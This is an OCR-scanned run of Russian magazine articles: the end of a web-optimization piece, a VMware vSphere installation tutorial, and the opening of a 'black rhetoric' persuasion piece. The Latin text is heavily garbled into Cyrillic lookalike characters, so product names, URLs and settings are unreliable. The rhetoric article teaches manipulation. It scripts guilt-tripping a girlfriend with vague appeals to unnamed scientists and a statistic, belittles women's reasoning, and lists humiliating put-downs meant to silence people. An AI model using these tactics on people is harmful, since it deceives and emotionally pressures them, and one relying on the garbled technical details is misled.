пользователям вдентификатор, сохранять его в кукисах и использовать 
для генерации уникального ключа тетсасЬесі. 

КЛИЕНТСКАЯ ОПТИМИЗАЦИЯ 

Эта статья посвящена серверной оптимизации веб-сайтов, однако было 
бы кощунством не рассказать и о клиентской части этого процесса. Поэ- 
тому мы кратко пробежимся по списку рекомендаций, направленных на 
минимизацию общего объема передаваемых данных: 

1 . Используй § 2 Ір или сіеПаНе для сжатия страниц и данных. Для этого 
можно задействовать модули НТТР-серверов: п§х_Ьйр_§ 2 Ір_тосіиіе для 
п^іпх, тосі_сотрге58 для іі^Ьпрсі и тосі_сіейаі;е для АрасЬе. 

2. Используй упаковщики для оптимизации и удаления лишнего мусора 
из НТМЬ и Іаѵа5сгірі: (обычно они удаляют все комментарии и пробелы, 
заменяют имена на более короткие и т.д., например, ѵѵеЬ-орі:ітІ 2 аі:ог, 

'■Л- : '/)• 

3. Выноси С 55 и іаѵа5сгірккод в отдельные файлы, тогда они смогут быть 
закэшированы браузером и применены к другим страницам (также их 
можно разместить на отдельном сервере, чтобы их загрузка происходріла 
параллельно). 

4. Для более плавной и корректной загрузки страницы браузером раз- 
мести загрузку С55 в начале страницы, а Іаѵа5сгірі; — в конце. 

6. Не забывай устанавливать заголовки Ехрігез и СасЬе-соШгоі, чтобы 
С55 и Іаѵа5сгірі; могли быть закэшированы браузером. 

7. Не применяй ІРС и РЫС тогда, когда можно обойтись СІР (например, 
для мелких иконок) 
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I Сергей «дгіпсіег» Ярег 



ічук дгіпсіеггазупаск.ги 



Виртуальная 

сфера 

УПРАВЛЯЕМ ОБЛАКАМИ С ПОМОЩЬЮ ѴМѴѴАРЕѴБРНЕРЕ 

Эра персоналоксустановленными программами неуклонно движется 
кзакату. На пороге эпоха клиент-серверныхтехнологий и облачных вы- 
числений. Буквально через пару лет нам обещают убрать в облака деся- 
тую часть приложений, но для этого нужны специальные инструменты, 
и кому как не ѴМѵѵаге быть здесь первой. 



Рынок виртуализации развивается стремительными темпами, засве- 
тились практически все крупные разработчики ПО: Місгозобі:, Огасіе 
Согроганіоп, Рагаііеіз, ѴМѵѵаге и многие другие. Очевидно, что борьба 
разгорелась нешуточная, и самый жирный кусок пирога сможет оторвать 
тот, кто предложит что-то принципиально лучшее и более функцио- 
нальное. Учитывая, что многие пользователи и организации выбирают 
вместо покупки прріложений их облачный аналог (5аа5, Зобцлгаге аз а 
зегѵісе. Программное обеспечение как услуга), особое место среди сис- 
тем виртуализации занимают решения, ориентированные на облачные 
вычисления. Такие какѴМѵѵаге ѵЗрЬеге. 

НАЗНАЧЕНИЕѴ5РНЕВЕ 

Официально исторрія ѴМѵѵаге ѵЗрЬеге Гѵѵѵѵѵѵ.ѵшѵѵаге.сот 
ѵзрЬеге) началась чуть больше года назад, в конце апреля 2009 года. 
Решение возникло не на пустом месте, а пришло на смену платформе 
виртуализации ѴМѵѵаге Ѵігшаі ІпбгазИгпсШге, наработки которой и были 
использованы. ѵЗрЬеге позволяет быстро развернуть надежную отказо- 
устойчивую инфраструктуру, объединить виртуальные системы, сети и 
хранршища в единые пулы ресурсов, сделать рабочую среду максимально 
устойчивой и управляемой. Многие специалисты называют ее первой 
истинно облачной операционкой. И вот почему. Сегодня чтобы приложе- 
ние заработало в облачной среде Соо^іе, Місгозоби Агпге или Атагоп, его 
код нужно переписать для них, либо создать с нуля. ѵЗрЬеге же призвана 
перенести исполнение приложений в облако максимально естественным 
и безболезненным для программиста, администратора и пользователя 
образом. Те программы, которые уже сейчас работают под управлением 
ПО ѴМѵѵаге, фактически оказываются готовыми к миграции в облако без 
нужды в каких бы то ни было патчах и модификациях. 

Список возможностей продукта очень большой, вьщелим только самые 
примечательные из них: 

• ѴМѵѵаге ѵЗшга^е ТЫп Ргоѵізіопіп^ — экономия дискового пространс- 
тва; используется только реально необходимый объем; 

• ѴМѵѵаге ѴМза^^е — высоконадежная кластерная файловая система, 
используемая для хранения виртуальных машин; 

• ѴМѵѵаге АРІ ѵЗшга^е и ѵСепНег Паі:а Кесоѵегу — централизованное 
резервное копирование и восстановление ѴМ из графической консоли; 

• ѴМѵѵаге Ноі: Асісі — «горячее добавление» устройств без остановки 
виртуальной машины; 

• ѴМѵѵаге ПізшЬпИесі Роѵѵег Мапа^етепі; — управление электропотребле- 
нием, позволяющее существенно сократить расходы; 

• ѴМѵѵаге Нозі: РгоШез — интерфейс управленрія, позволяющий центра- 



лизованно настраивать узлы ѴМѵѵаге Е5Х/Е5ХІ и контролировать уста- 
новки на соответствие политикам. Плюсуем сюда компонент ѵПеГѵѵогк, 
обеспечивающий централизованное управление виртуальной сетью, 
средства «горячей» миграции — ѴМѵѵаге ѴМойоп, кластеризации — 

Ні§1і АѵаіІаЬіИіу и высокой доступности — Еапк Тоіегапсе, балансировки 
нагрузки — ѴМѵѵаге ПК5, а также поддержку технологии перемещенрія 
виртуальных дисков — Зшга^е ѴМоі:іоп. Причем экономрря при исполь- 
зовании ѵЗрЬеге достигается и за счет того, что для некоторых операций 
(например, резервированрря) уже не нужно закупать продукт стороннего 
разработчика (скажем, Ѵееат Васкпр, ѵѵѵѵѵѵ.ѵееат.сот) . Поддержи- 
ваются ограниченрря в потреблении СРП, НАМ как для пулов ресурсов 
(Кезопгсе Рооі) , так и для отдельных хостов с возможностью гарантиро- 
ванного вьщеленрря ресурсов (Кезегѵайоп) . Полный список ОС, на кото- 
рых могут работать разные продукты ѴМѵѵаге, представлен на странице 
ѴМѵѵаге СотраніЬіИіу Спісіе, заявлена поддержка всех популярных сегод- 
ня систем — ѴѴіпсіоѵѵз и варианты "піх. В ѵЗрЬеге, по сравнению с Ѵігшаі 
Іпка5і:гисШге, изменрілся и порядок лицензирования, который стал чуть 
гибче, так как теперь лицензия рассчитывается по числу процессоров (их 
количество вбивается в ключ) ; ранее привязка шла к паре СРП. Причем 
если количество ядер не превышает 6 (в версиях Абѵапсесі и Епшгргізе 
РІП5 — 12), то дополнительная оплата не потребуется. В разгар кризиса 
такой ПОДХОД только приветствуется, ведь при принятии решения о пере- 
ходе на виртуальные машины учитываются десятки критериев. 

ѴМѵѵаге ѵЗрЬеге состоит из следующих компонентов: 

• гипервизоров ѴМѵѵаге Е5Х и/или ѴМѵѵаге Е5Хі (собственно на них все и 
работает); 

• ѴМѵѵаге ѵСегПег Зегѵег А^епи, обеспечивающего подключение гипер- 
визоров к центру управления ѴМѵѵаге ѵСепНег Зегѵег (ранее — ѴМѵѵаге 
ѴігШаІСепНег Зегѵег) ; 

• самого ѵСепнег Зегѵег, отвечающего за развертывание, централизован- 
ный менеджмент и обеспечение доступа (приобретается отдельно) ; 

• прочих компонентов, обеспечивающих основные возможности, состав 
которых варьируется в зависимости от выбранной лицензии. 

На момент написания этих строк на сайте ѴМѵѵаге появршась версрія 
ѵЗрЬеге 4 ирбаш 2, ее и будем препарировать. 

РАЗВЕРТЫВАНИЕѴ5РНЕКЕ 

Пока читаешь описание, первая мысль, которая приходит в голову 
новичку — это очень сложно. На самом деле при внимательном подходе 
и выполнении всех требований процесс развертывания и последующего 
добавленрія хостов и ѴМ весьма прозрачен. 
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Чтобы установить ѵЗрЬеге, надо выполнить ряд требований 
и пройти несколько шагов: 

• сверить имеюш;ееся оборудование со списком ѴМѵѵаге 
Нагбѵѵаге СотраніЬіІііу Ьізі;; 

• проинсталлировать ѴМѵѵаге ѵЗрЬеге Е5Х/Е5ХІ Зегѵег на 
физических серверах (2x2 Гц 64 Ьп СРІІ, 2 + Гб НАМ, 2 + Гб 
НОВ); 

• установить ѴМѵѵаге ѵСепНег Зегѵег и ѵЗрЬеге СИепи для 
управления Е5Х(і) -серверами; 

• настроить сеть храненрія данных 5АЫ; 

• развернуть клиентские ОС в виртуальных средах. 

Выше показаны только основные шаги, каждый этап требует 
и промежуточных настроек (настройка сети, 5АН, при 
необходимости Асніѵе ОігесШгу и такдалее) . Некоторые из 
этих моментов очень подробно описаны в документации, 
которую можно найти по адресу ѵѵѵѵѵѵ.ѵтѵѵаге.сот/зиррогі:/ 
риЬ5/ѵ5 риЬз.ІіРтІ . Вкратце разберем основные вопросы по 
настройке и управлению ѵЗрЬеге, чтобы наглядно пред- 
ставить, с чем имеем дело. На странице закачки, которая 
будет доступна после регистрации, выбираем для установки 
гипервизор ЕЗХили ѴМѵѵаге Е5Хі, ѴМѵѵаге ѵСетег Зегѵег (в 
ввде 150-образа или гір-архива) . Плюс здесь же опциональ- 
ные компоненты: Зегѵег НеагЛеаЦ Оаі:аКесоѵегу (СО 150) 
и ѵ5Ые1сі 2опе5. Для небольших организаций, вероятно, 
больше подходит бесплатная платформа ѴМѵѵаге Е5Хі, об- 
ладаюш;ая всеми необходимыми возможностями. Сначала 
разворачиваем ѴМѵѵаге Е5Х ріли Е5Хі, учитывая, что их осно- 
ва — Гіппх (хотя и несколько урезанный) , установку можно 
назвать стандартной, и проблем она обычно не вызывает. 
Просто следуем указаниям визарда: принимаем лицензию, 
настраиваем сеть и выбираем диск. После перезагрузки мы 
можем управлять гипервизором из консоли, через веб-ин- 
терфейс Р 1 ЛИ установив ѵ5р1іеге СИепи. Последний можно ска- 
чать с веб-страницы виртуальной машины, адрес которой 
будет доступен после установки Е5Х(і) или в ѵСепНег. 
Следующий шаг — установка ѴМѵѵаге ѵСепНег на компьютер 
под управлением ѴѴіпсіоѵѵз. Упоминаний о версии на сайте 
найти не удалось, но центр без проблем встал как наХР, так 
и на 2к8К2. Все данные ѵСепЩг хранит в базе данных, для 
небольших сред (5 физических, 50 виртуальных машин) 



можно использовать Місгозо^и 5рГ 5егѵег 2005 Ехргезз, 
который вдет с установочным архивом и предлагается 
по умолчанию. Иначе в процессе установки нужно будет 
настроить подключение к СУБД. Если хостов не много (до 
250), то можно обойтись и 32-битной версией. Резюме: для 
небольшого количества серверов достаточно клиентской 
32-битной ХР с бесплатным 5^^ Ехргезз, в более мощных 
конфигурацріях првдется разворачивать сервер с 64-битной 
ОСЬЮ и 5рЕ-сервером. Скачиваем 150-образ ріли гір-архив, 
запускаем установочный файл и в окне мастера выбираем 
ссылку ѵСепНег 5егѵег. К слову, архив содержит дистрибути- 
вы и некоторых других продуктов: ѵ5р1іеге СИепи, ѵСепНег 
Спісіесі СопзоИбайоп, ѵСепнег Прсіане Мапа^ег, ѵСепнег 
Сопѵегнег, ѵСетег ОгсЬезггаШг и ѴМѵѵаге Сопзоіісіащсі 
Васкпр. Язык инсталлятора — английский. Во время 
инициализации установочного скрипта будут произведены 
проверки на совместимость и, в случае несоответствия, вы- 
даны рекомендации. Например, так как ѵСепНег использует 
свой веб-сервер, он будет конфликтовать с установленным 
ІІ5 по портам. Хотя в процессе можно изменить настройки, 
указав порт по умолчанию для большинства сервисов: Ьйр, 
Ьцрз, ГПАР, 55Е, ЬеагЛеан. Пакет самодостаточен, если чего- 
то будет не хватать, все необходимое (.Неи, і# и др.) мастер 
доустановит автоматически. Несколько серверов ѵСепНег 
можно объединить в связанную группу (Гіпкесі Мойе) и 
управлять затем всеми настройками виртуальных машин с 
любого компа в сети. По умолчанию предлагается 5і;апсіа1опе 
установка, но установив на шаге «ѵСепНег 5егѵег Гіпкесі 
Мосіе Орніопз» переключатель в положение «іоіп а ѴМѵѵаге 
ѵСепНег 5егѵег §гопр ...» мы можем сразу подключиться к уже 
существующей группе серверов ѵСепНег. Вот, собственно, и 
вся установка сервера. Некоторое время ждем, пока мастер 
настроит сервисы, сгенерирует сертификаты и скопирует 
файлы. По окончании аналогично устанавливаем остальные 
компоненты, доступные в окне ѵСепНег Іпзиаііег, если, конеч- 
но, в этом есть необходимость. Опять же, их необязательно 
ставить на один и тот же комп, хотя так обычно удобнее. 

При установке ѵСепнег Нрсіане Мапа^ег (ѵСНМ) указываем 
ІР-адрес сервера ѵСепнег и учетные данные для доступа. В 
качестве базы данных, к которой необходимо подключиться. 




НТТР://ѴѴѴѴѴѴ 

"■ Г 

> Ііпк5 

• Стра н и ца ѴМѵѵа ге 
ѵЗрЬеге — ѵтѵѵаге. 
сот/ргосІисіз/ѵзрЬеге 

•Документация по 
установке различных 
компонентов ѵЗрЬеге 
— ѵтѵѵаге .сот/ 
зиррогі/риЬз/ѵз риЬз. 
Ьіті. 

• Проверить 
64-битностьСРП- 
хостов можно при 
помощи утилиты СРП 
Иепіііісаііоп, разме- 
щенной на странице 
\ллллл/.ѵтѵѵаге.сот/ 
сІоѵѵпІоасІ/зЬагесІ 
иііІШез.ЬітІ. 
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5ѴМ/АСК 




Устанавливаем ѴМѵѵаге Е5Хі 



ѵтѵѵаге' 



ѴѴеІсогпе Ш ѴМѵѵаге Оо 









ѴМ^аге <5о™ доЕ уои з^сагЕесі. 
ѴѴе'Іі Ьеір уои аѵЫсі плгзз^ерз. 




ІГ рн^г> гтпт |[р ѵИМІІтгікні. піг ѴІИТѴМ.і:24Т|ОН ^ѴССЕЗі. 



ѴНео аЬсіііІ: ѴМѵѵаге бо 




Онлайн-сервис ѴМѵѵаге 6о позволяет быстро 
виртуализировать сервера 



указываем созданную ранее БД. Внимание: при запросе пароля в окне 
«ВаНаЬазе ІпГогтаніоп» поле оставляем пустым, в этом случае будет ис- 
пользована ѴѴіпсіоѵѵз-аутентификация. Каталог, куда будут помещаться 
обновления, лучше расположить на отдельном разделе харда, который 
имеет достаточно свободного места (не менее 20 Гб) . Его и указываем 
на шаге Везйпайоп РоИег для «Сопй^пге Ле Іосайоп (ог сіоѵѵпіоасііп^ 
ращЬез». Клиентская часть ѵЗрІіеге СИеЩ, при помощи которой произ- 
водятся все настройки, обычно ставится на комп админа (минимальные 
системные требования: Репніит II 300, 200 Мб НАМ и 1 Гб НОВ) . 

ДОБАВЛЕНИЕУЗЛОВ И ЛИЦЕНЗИЙ 

Установка закончена. Открываем из меню ѵЗрЬеге СНепі, вводим логин и 
пароль (флажок ІІзе ѴѴіпсіоѵѵз зеззіоп сгебепйаі позволит подключиться с 



Управление при по- 
мощи Роѵѵег8пе11 

Какие бы аргументы ни приводили сторонники СІІІ, но при 
управлении большим количеством систем лучше командной 
строки средства нет. Используя скрипты, можно автомати- 
зировать большую часть рутинных задач, не прописанных 
в СІЛ. Разработчики ѴМѵѵаге предлагают дополнение к 
Роѵѵег 8Ье11 — Роѵѵег СІІ ( ) . После 

установки будет доступен ряд командлетов, основные из 
которых — Сонпес1:-ѴІ8егѵег, СеІі-ѴМ и СеІ-ѴІСоттапсІ. По- 
рядок работы с ними не отличается от других командлетов 
Роі/ѵег8Ье11. Для тех, кому лень писать скрипты самостоя- 
тельно, предложен рекордер макросов ѴМѵѵаге Р^о^ес1: Опух 
( 

ЬегеЛШпІ), умеющий генерить Роѵѵег8Ье11-скрипты, записы- 
вая действия пользователя в ѴМѵѵаге ѵ8рЬеге Сііені:. 
Информация по работе с РоѵѵегСЬІ доступна в блоге Ыо^^з. 




Выбираем зІапсІаІопе-вариантустановкиѵСепІег 
Зегѵег 



Сервер, который будет использоваться для виртуализа- 
ции, должен иметь оборудование, совместимое с ѴМѵѵаге 
Нагсіѵѵаге СотраПЬШіу Ызі: Гѵшѵѵаге.сот/^о /ЬсП . Доступ- 
ны и неофициальные списки оборудования, подходящего 
для тестовых и демо-установок: ѴМ Неір (ѵт-Ье1р.сот / 

), ѴМѵѵаге ' 8 СоштинШез 

ІІ8І: ( ) и ІіШтаІіе Е8Х 

ѴѴЬйеЬох (цШтаІіеѵѵЬіІіеЬох.сот) . 

текущими учетными данными) , принимаем сертификат. 

Появившееся окно клиента выполнено в стиле Проводника. Слева вы- 
бираются компьютеры, справа настройки, внизу панель текущих задач. 
Обрати внимание на строку адреса. После первой регистрации ты попа- 
даешь во вкладку настроек ОС в «Ноте Іпѵепіогу Нозі: апсі Сіпзіегз», 
а они нам пока не нужны. Чтобы получить доступ ко всем возможностям 
ѵЗрЬеге, просто переходим в «Ноте». 

Область управленрія разделена на три части по назначению: 

• Іпѵепііогу — поиск систем, добавление узлов и кластеров, сіаіасетег, 
управление разрешениями; 

• АдтіпІ8Іта1:іоп — управление ролями, сессиями, лицензиями, настрой- 
ками ѵЗрЬеге, просмотр журнала и статуса работы сервиса; 

• Мапа^етеШ: — управление задачами, вывод событий и карты 
виртуальных машин, создание профилей хостов. 

Учитывая небольшое количество подпунктов в каждом из них, време- 
ни на знакомство с интерфейсом уйдет немного. Не могу не отметить 
наличие всяческих подсказок и мастеров; если не выполнен какой-ни- 
будь обязательный шаг, то сразу получишь ссылку и рекомендации, что 
делать. Интерфейс «задача-ориентированный», то есть админ что-то на- 
страивает, а ѵЗрЬеге по мере возможностей последовательно выполняет 
задачи. Главное — не нужно ждать, пока выполнится одна задача, чтобы 
настроить следующий пункт. Большинство операций требуют некоторо- 
го времени и происходят в фоне, поэтому отслеживай статус внизу окна. 
Всплывающее окно сразу же показывает количество дней, оставшихся до 
окончания пробного периода. Если лицензия уже приобретена, то самое 
время ее ввести. Переходим в «Абтіпізігапоп Еісепзіп^», выбираем 
систему и в контекстном меню пункт «Манате ѵБрЬеге Еісепзез». Копи- 
руем в окно лицензию и нажимаем «Асій Еісепзе Кеуз». Чтобы сопоста- 
вить ключ конкретному серверу, переходим в «Аззі^п Еісепзез» или в 
контекстном меню выбираем «СЬап^е Еісепзе Кеу». 

Теперь самое главное — подключение Е5Х(і) . Сначала создаем 
ПаіаСепіег, без этого шага дальше мы все равно не пойдем. Щелкаем по 
«ПаіаСепіег» и выбираем ссылку «Асій а Ьозі». Появляется очередной 
визард, в первом окне которого вводим имя или ІР узла и логин/пароль 
для управления; подключаемся, принимаем сертификат и получаем 
информацию о системе. При необходимости здесь же можно добавить 
лицензию и ввести данные об узле. Некоторое время придется подож- 
дать, пока хост будет добавлен. Далее выбираем хост, в окне Зпттагу 
выводятся все данные по нему. Перейдя в окно СопБ^пгайоп, получаем 
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Клиентуправления ѵБрИегеСІіепІ 



Добавляем лицензию 




Подсчет необхо- 
димости перехо- 
да на ѴМ 

Переход с физических серверов на виртуальные 
связывают, в первую очередь, с возможностью 
сэкономить. Но обосновать необходимость на 
пальцах перед шефом не всегда просто. Специаль- 
ные ТСО/КОІ-калькуляторы, предлагаемые 
разработчиками ѴМ, помогут быстро и наглядно 
сделать все необходимые расчеты (ТСО — Тоіаі 
Со8І; о( ОілшегзЬір — стоимость владения инфра- 
структурой, КОІ — КеШгн он інѵезіітепі; — коэффи- 
циент рентабельности инвестиций). Калькулятор 
от ѴМѵѵаге расположен по адресу игѵѵш.ѵтѵѵаге. 
сот /саісиіаіог и показывает, сколько будет сэко- 
номлено на покупке железа, электроэнергии, и на- 
поминает о других преимуществах, которые дает 
виртуализация: надежность, бесперебойность, 
упрощение обслуживания. 

возможность изменить некоторые настройки: параметры 
сети (подключение ѴМоніоп, І5С5І, МР5 и другие), виртуаль- 
ного свича, хранилищ данных и так далее. После добавления 
нескольких хостов станет доступна возможность созданрія 
кластера. Выбираем в контекстном меню пункт Ыеѵѵ Сіпзиег, 
визард попросит ввести имя будущего кластера. При помо- 
щи чекеров устанавливаем поддержку НА (Ні^Ь АѵаіІаЬіИіу) 
и ПК5 (ПізшЬпііесі Кезопгсе ЗсЬесіиІег) . Шедулер представ- 
ляет собой простой балансировщик, который постоянно 
отслеживает использование ресурсов и перераспределяет 
вычислительные мощности в пулах ресурсов в соответствии 
с изменяющимися потребностями виртуальных машин. 
Если он активирован, в дальнейшем мастер предложит вы- 
брать один из вариантов миграции ѴМ (Маппаі, Рагпаііу, РиП 
ащотащб) и метод миграции (от СопзегѵайѵедоА^^геззіѵе). 
Настраиваем управление питанием (ПРМ), активируем 
мониторинг хостов, включаем ЕѴС (ЕпЬапсесіѴМойоп 
СотрайЬіИіу) , определяем место хранения своп-файла. 

К слову, суть ЕѴС очень проста. Как известно, процессоры 
бывают разные, и гостевая ОС, установленная в системе, 
может использовать разные фишки вроде 55Е. Но что будет, 
если эту ОС взять и перенести при помощи ѴМоі:іоп в другую 
систему, в которой совсем другие технологии? Вот ЕѴС и 
приводит все к единому знаменателю, просто отключая 
«лишнее», в результате перенос ѴМ проходит гладко. Доступ- 
ны два варианта включения ЕѴС — для АМН- и Ішеі-хостов. 
После выбора пунктов будет показан список совместимых 
процессоров. Хотя, если в кластере все сервера одинаковы. 





и и ІА — ^ 









Уемш шц ш ішѵ 

ѵйігі ркІі№ -Пн рчі* ѵ’ЧГ пѵМіпгіа' Іаѵ 

[1гік«т Ь гѵвіѵі 







ѵЗрЬегедаетполезные подсказки подаль- 
нейшим действиям 



ЕѴС МОЖНО совсем отключить. Кластер создан, но хосты в 
него мы еще не добавили. Это очень просто: берем и тащим 
мышкой. Сразу же стартует новый мастер, в котором можно 
все оставить по умолчанию, жмем два раза «НехЦ> и анало- 
гично добавляем остальные хосты. 

После всех операций становится доступным пункт «Неріоу 
ОѴЕ Тетріане», позволяющий добавить шаблоны виртуаль- 
ных машин в формате Ореп Ѵігшаіігацоп Еогтаи как с 
локального диска, так и через интернет (кстати, такой 
образ можно создать самостоятельно, воспользовавшись 
утилитой ѴМѵѵаге ОѴЕ Тооі) . Процесс добавления упро- 
щает очередной мастер. Добавленную ОСь сразу же можно 
запустить и проверить в работе. Осталось распространить 
добавленные образы ОС на хосты. Ддя этого выбираем в кон- 
текстном меню пункт «Мі^гане» и в окне мастера указываем 
хост, на который его необходимо скопировать. 

Учитывая то, что облачные системы могут обслуживаться 
большим количеством админов с разными правами, их 
желательно как-то разделить по возможностям. В ѵЗрЬеге 
используется ролевая концепция, после установки в 
«АсітіпізіігаЦоп Коіез» доступно 9 шаблонов ролей, позво- 
ляющих выбрать и за один клик назначить юзеру его права. 
Простой мастер предоставляет возможность создать любое 
количество новых ролей. 

ЗАКЛЮЧЕНИЕ 

В рамках одной статьи невозможно рассказать обо всех 
возможностях столь мощного продукта. За бортом остались 
такие функции как Еаик Тоіегапсе (ѴМЕТ, запуск второй 
копии виртуальной машины, на которую происходит пере- 
ключение в случае проблем с основной ѴМ), Знога^е ѵМоніоп 
(ЗѴМойоп, «горячий» перенос файлов дисков ѴМ между 
массивами хранилищ), горячее добавление устройств, 
управление ресурсами и мониторинг работоспособности. 
Здесь тебе на помощь придет многочисленная докумен- 
тация и поясняющие видеоролики (ѵтѵѵагееіеагпіп^. 

Ыір.Гѵ, уопшЪе.сот/изег/ѴМѵѵагеКВ, уопшЬе.сот/изег/ 
ѴМѵѵагеЕЕеагпіп^) . 




втрех редакциях: 
ЗіапсІагсІ, АсІѵапсесІ 
и Епіегргізе. Для 
небольших органи- 
заций предлагаются 
выпуски Еззепбаіз 
и Еззепііаіз Ріиз, 
обеспечивающие 
виртуализацию трех 
серверов. 

• В последней 
(четвертой) версии 
компонентѵМеІѵѵогк 
научили регули- 
ровать исходящий 
трафик виртуальной 
машины в сеть 

и входящий трафик 
из сети к виртуаль- 
ным машинам для 
групп портов (так 
называемый двунап- 
равленный шейпинг). 

• В документации на 
сайте можно найти 
таблицы сравнения 
ѵЗрЬеге с другими 
продуктами виртуа- 
лизации по стоимос- 
ти и функциональ- 
ности. 

• Бесплатный веб- 
ин струме нт ѴМѵѵаге 
6 о ( до.ѵтѵѵаге.сопп ) 
позволяет быстро 
перейти к использо- 
ванию гипервизора 
ѴМѵѵаге Е5Хі для 
виртуализации физи- 
ческих серверов 

в небольшой компа- 
нии. 

• Перед установкой 
ѵЗрЬеге следует раз- 
решить прохождение 
пакетов по портам 80, 
389,443.636.902/903. 
8080 и 8443. 
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Оксана «Огіуапа» Андреева огіуапагахрзусНо.ги 




Р8ѴСН0: 

АТАКА СЛОВОМ 

Черная риторика в процессе убеждения 

Как-то повелосьс незапамятных времен, что риторика — это удел 
мастеров слова; ораторов, юристов, коучей, актеров. Обычная ри- 
торика — да, там естьсвои правила, и чтобы иметь право называть- 
ся специалистом, надо их учитывать. А вот нам, простым смертным, 
в этом плане повезло больше — у нас есть более простой и, в то же 
время, более изоидренный метод воздействия на аудиторию. Это 
черная риторика, и здесь одно правило — нет никаких правил. 



Кому и для чего это нужно? 

Если ты думаешь, что по жизни никого 
убеждать не нужно — считай, тебе повезло; 
возможно, даром внушения ты обладаешь 
лучше, чем даром убеждения. Дальше мо- 
жешь не читать — иди и наслаждайся своими 
талантами :). Если ты уже слышал это слово, 
но не знаешь, где и как его применить, сейчас 
я открою тебе глаза. 

Итак, где может понадобиться убеждение: 

• уговорить девушку на .... (выбор за тобой :) ); 

• запудрить мозги преподу на экзамене; 

• впарить чукчехолодильник(или какому- 
нибудь кулхацкеру — троян); 

• убедить кого-то в интернете, что он не прав; 

• обоснованно объяснить шефу, почемутебе 
нужно повышение зарплаты и личный кабинет; 

• и еще куча бытовых мелочей типа выдвиже- 
ния своей кандидатуры на депутатскую долж- 
ность или организации революции. По сути, 
везде, где нужно добиться своей цели речью, 
можно применять черную риторику. 

Итак, если хоть один пункттебя заинтересовал 
— поехали. 

Черная риторика 

Теоретически это использование различных 
речевых приемов с целью убедить, направить 
разговор в нужное русло, подвести собе- 
седника или публику ктребуемому выводу. 
Практически она играет не только словами, 
но и мыслями, представлениями и даже ми- 
ровоззрением. Ее приемы дезориентируют. 



сбивают с толку, вызывают всплеск эмоций, 
увлекают в создаваемые образы, открывают 
новые горизонты и разрушают привычные 
стереотипы, развенчивая разумные доводы 
и создавая из абсурдных фактов логически 
четкую картину. Отличие черной риторики от 
белой в том, что белая — это убеждение оппо- 
нента с соблюдением правил спора, а черная 
нарушает все возможные рамки. Цель одна 
— во что бы то ни стало достичьтребуемого 
результата. 

Приемы черной риторики 
Повторение наиболее 
важных моментов 

Повторяй свою идею как можно чаще — это 
помогает информации прочно осесть в созна- 
нии и за его пределами. Только не надо талды- 
чить одну и туже фразу — это выглядит скучно 
и подозрительно. Прояви фантазию: возьми, 
в конце концов, словарь синонимов и играйся 
ими, как хочешь. Например, твоя девушка 
хочет свадьбу, а ты еще не готов; твоя задача 
убедить ее подождать неопределенное коли- 
чество времени. Сначала выбери концепцию, 
на основе которой будешь строить убеждение, 
например, это будет идея «Официальные от- 
ношения разрушают чувства». Начинаем. Для 
затравки подойдет«Сколько пар распадается 
после узаконивания отношений...» (предва- 
рительно найди примеры, чтобы убеждение 
не было голословным. Факты — твое оружие, 
она-то еще неуспела так основательно под- 



готовиться к дебатам). Дальше подключай 
авторитетов: «Ученые проводили исследо- 
вания, которые показали, что после свадь- 
бы подавляющее большинство пар теряет 
романтику в отношениях» или «Почитай 
любой учебник по семейной психологии. 
Специалисты пишут, что в течение первого 
года после женитьбы распадается около 30% 
пар». Следующий шаг— призыв клогике 
(только не переборщи, она ведь девушка): 

«И это понятно, ведь пока мы не скреплены 
штампом, мы можем потерять друг друга, и 
поэтому дорожим и пытаемся быть интерес- 
ными. Кактолько терять будет нечего — про- 
падет и желание что-то делать ради любимого 
человека». Не забудь поиграть с чувством 
ВИНЫ: «Ты меня будешь любить, только если 
я официально на тебе женюсь?». И в конце 
— тяжелая артиллерия: «Я слишком люблю 
тебя, чтобы потерять из-за какой-то печати на 
10-й странице паспорта...». После этого, если 
она сразу не бросится тебе на шею со слезами 
благодарности, просто молча выйди хотя бы 
на минутку — она ей понадобится для того, 
чтобы побыть наедине со своими мыслями и 
переварить услышанное. Это очень хороший 
манипулятивный прием. 

Как видишь, у всех тезисов смысл одина- 
ковый, но поданы они по-разному: один апел- 
лирует клогике, второй — к эмоциям, третий 
задействует доверие к авторитетам. Кстати, 
если оперативная память подруги медлен- 
нее, чем память твоего компа — подавай ей 
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[УНИЧТОЖАЮЩИЕ СОБЕСЕДНИКА 



В арсенале любого «черного оратора» должны быть фразы, с помощью которых можно 
смутить, обескуражить, заставить замолчать. Здесь я приведу несколько примеров, а даль- 
ше по аналогии составишь список сам. 

— Это самая дурацкая идея, которую я слышал за последние 3 часа! 

— Не стыдно в Вашем возрасте (положении) говорить такие вещи? 

— От специалиста Вашего уровня мы не ожидали услышать такие непрофессиональные 
предложения... 

— Вы сами хоть понимаете, что Вы только что сказали? Потому что никто не понял... 

— Как Вы пришли к такому ошибочному выводу? 

— Вы это сейчас серьезно сказали...? 

— В этой теме Вы разбираетесь очень плохо; зато, наверное, хорошо играете в бильярд. 

— И что? 



информацию с перерывами: один утром, 
второй за ужином, третий приобщениив 
компании... 

Вопросы и ответы 

Если ты видишь, что собеседникоткровенно 
лукавит, прямо скажи: «Представь себя на 
моем месте: ты бы поверил тому, что и какты 
говоришь?». 

Почащезадавайуводящие в сторону вопросы 
— чем чаще оппонентбудетотвлекаться,тем 
труднее ему будет сконцентрироваться на вну- 
шении своей идеи. Как вариант: можно засто- 
пориться на какой-нибудь неправдоподобной 
или неоднозначной мелочи и долго пытаться 
прийти к истине — в итоге конечная цель его 
речи будет л ибо отсрочена, либо забыта. 

Если же такие вопросы задаюттебе, постарай- 
ся вернуть оппозиционера в русло: «Я отвечу 
натвои не относящиеся ктеме вопросы в 
любое время, кактолько мы решим поставлен- 
ные на данный момент задачи. А сейчас давай 
сконцентрируемся на них». Или «Ты задал 
этот вопрос, чтобы сменить тему разговора, 
поэтому я его пока проигнорирую». 

Или «Прежде чем отвечать на вопрос, давай 
определимся, что ты подразумеваешь под ...» и 
дальше перечисляй все понятия, озвученные 
в вопросе. 

Можно уходить от ответа, откладывать его, вы- 
двигать встречные вопросы или обвинения. 

Создание пространства 

Если междутобой и собеседником нет 
противостояния, и ты просто хочешь его в 
чем-нибудь убедить, увлечь, создай образ, 
в котором ты видишь и чувствуешь каждую 
деталь. Здесь не нужно никого убеждать в при- 
вычном смысле слова; позитивный результат 
достигается за счет«соблазнения». Другими 
словами, при прямом убеждении ты аргумен- 
тами принуждаешь человека сделать что-то; 
в случае сувлечением в созданноетобой про- 
странство —ты делаешьтак, что человексам 
захочет сделать это. 

Использование 

специфической 

терминологии 

Во-первых, запутываетсобеседника. Мало кто 
